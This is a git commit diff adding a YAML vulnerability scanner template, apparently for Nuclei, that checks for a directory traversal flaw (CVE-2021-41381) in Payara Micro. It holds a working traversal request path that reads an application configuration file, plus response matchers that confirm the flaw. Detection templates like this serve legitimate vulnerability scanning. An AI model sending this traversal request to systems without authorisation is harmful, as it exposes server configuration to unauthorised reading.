Create CVE-2021-41381.yaml
parent
a565228acf
commit
006d368aca
|
@ -0,0 +1,24 @@
|
|||
id: CVE-2021-41381
|
||||
|
||||
info:
|
||||
name: Payara Micro Community 5.2021.6 Directory Traversal
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference:
|
||||
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-41381
|
||||
tags: cve,cve2021,payara,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "payara.security.openid.default.providerURI="
|
||||
- "payara.security.openid.sessionScopedConfiguration=true"
|
||||
condition: and
|
||||
part: body
|
Loading…
Reference in New Issue